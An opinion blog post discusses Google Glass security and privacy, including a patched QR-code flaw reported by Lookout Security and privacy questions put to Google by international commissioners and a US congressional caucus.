The hacking of Google Glass commences.
There are a few things to note. In terms of full disclosure, I am of the opinion that Google Glass is unnecessary and creepy. At the same time, I understand that Google–and other companies working on similar projects–have every right to produce and market these and other wearable computing devices.
The fact that a new IP-based computer platform is attracting hackers is not a surprise. In this case, the approach was to subvert QR codes that are included to carry out owners’ instructions:
Because Glass was programmed to process every QR code that it detected, an attacker could abuse it by forcing the devices to connect to a malicious Wi-Fi access point or Bluetooth connection.
The problem was detected by Lookout Security, which informed Google. Google did the right thing and patched the vulnerability, according to the story.
There was a great deal of attention on security and privacy matters when Google Glass first was introduced. Matt McGee at Marketing Land provides some good background. The dust has settled somewhat, but it is worth revisiting the topic in light of the Lookout Security research.
In recent years, hacking has moved from lone-wolf types acting on a variety of impulses–some mentally healthy, some not–to more organized groups firmly looking to make money. Though the pendulum has swung, both groups still exist. Google Glass offers a lot for both, such as exposing suspected corruption and illegality, personal bribery, industrial espionage and other nasty doings.
It is interesting that the Edward Snowden affair occurred after the introduction of Google Glass. The two are not directly related and, of course, there is a wide variety of opinion on what Snowden did. But the bottom line in this context is that there are plenty of people who will use technology to divulge information regardless of the law.
Google, of course, is being raked over the coals. Last month, Huffington Post reported that pointed questions from all over the world have been delivered to Google:
The letter, co-signed by 10 privacy and data commissioners from Mexico, Israel, Canada, New Zealand, Australia, Switzerland and a Dutch representative from the European Commission, outlined eight questions concerning Glass’ privacy safeguards. They ranged from what information Glass collects and how Google uses that data, to how Glass might incorporate facial recognition in the future.
Things are not going any easier at home. The Washington Post reported that in May, the House Bipartisan Privacy Caucus sent the company questions about the privacy and security of Google Glass. The answers, apparently, didn’t hit the mark:
But Rep. Joe Barton (R-Tex.), co-chairman of the caucus, said that Google has failed to answer the key question: How can it ensure the privacy of passersby who have not agreed to be photographed or videotaped?
Barton’s question is a good one. Google, according to the story, points out that overt gestures are necessary to start the Glasses and that an ongoing glow makes it obvious when they are operational. What it doesn’t say, however, is how it prevents hackers from disabling those features.
Google is not the guilty party here. It is an easy target. But, in the final analysis, it is doing what companies do: Developing products within the boundaries of existing laws that it thinks will make money. Companies, to a large degree, are not moral or immoral. They are amoral. The challenge is that the technology now available is inherently dangerous.
Finally, it is important to recognize that this goes way beyond Google. The company is a bellwether, but there are many others in the wearable computing sector. The danger is that their approach to security and privacy may be less stringent than Google’s simply because they are operating under the radar. Any framework addressing these issues must be codified in such a way that all the players are mandated to comply.